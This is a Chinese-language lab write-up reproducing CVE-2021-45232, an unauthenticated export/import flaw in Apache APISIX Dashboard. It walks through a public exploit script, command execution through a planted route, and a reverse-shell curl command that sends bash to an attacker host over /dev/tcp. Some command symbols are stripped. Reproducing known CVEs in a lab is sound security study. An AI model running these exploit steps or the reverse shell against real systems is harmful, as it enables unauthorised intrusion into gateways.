Apache APISIX Dashboard API权限绕过导致RCE(CVE-2021-45232)复现
Apache APISIX是一个动态、实时、高性能API网关而Apache APISIX Dashboard是一个配套的前端面板。Apache APISIX Dashboard 2.10.1版本前存在两个API/apisix/admin/migrate/export和/apisix/admin/migrate/import他们没有经过droplet框架的权限验证导致未授权的攻击者可以导出、导入当前网关的所有配置项包括路由、服务、脚本等。攻击者通过导入恶意路由可以用来让Apache APISIX访问任意网站甚至执行LUA脚本。漏洞复现机器ip靶机10.22.102.175kali10.132.1.173然后访问http://your-ip:9000/即可看到Apache APISIX Dashboard的登录页面。漏洞利用利用/apisix/admin/migrate/export和/apisix/admin/migrate/import两个Apache APISIX Dashboard提供的未授权API可以简单地导入一个恶意配置文件这里通过漏洞利用脚本来进行攻击git clone https://github.com/wuppp/cve-2021-45232-exp通过漏洞利用脚本来添加恶意脚本注意最后一行的url is.┌──(kali㉿kali)-[~/Desktop] └─$ cd cve-2021-45232-exp-main ┌──(kali㉿kali)-[~/Desktop/cve-2021-45232-exp-main] └─$ ls apisix_dashboard_rce.py README.md readme.png ┌──(kali㉿kali)-[~/Desktop/cve-2021-45232-exp-main] └─$ python3 apisix_dashboard_rce.py http://10.22.102.175:9000 attack success uri is: /7eC9tu添加完恶意脚本后需要访问Apache APISIX中对应的路径来触发前面添加的脚本。而Apache APISIX和Apache APISIX Dashboard是两个不同的服务Apache APISIX Dashboard只是一个管理页面而添加的路由是位于Apache APISIX中所以需要找到Apache APISIX监听的端口或域名。在当前环境下Apache APISIX监听在9080端口下。执行如下命令来执行id命令┌──(kali㉿kali)-[~/Desktop/cve-2021-45232-exp-main] └─$ curl http://10.22.102.175:9080/7eC9tu -H cmd:id uid99(nobody) gid99(nobody) groups99(nobody)命令执行成功。反弹shell本地kali监听1234端口然后执行如下命令curl http://10.22.102.175:9080/7eC9tu -H cmd: bash -c exec bash -i /dev/tcp/10.132.1.173/1234 1成功拿到目标的shell。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2497829.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!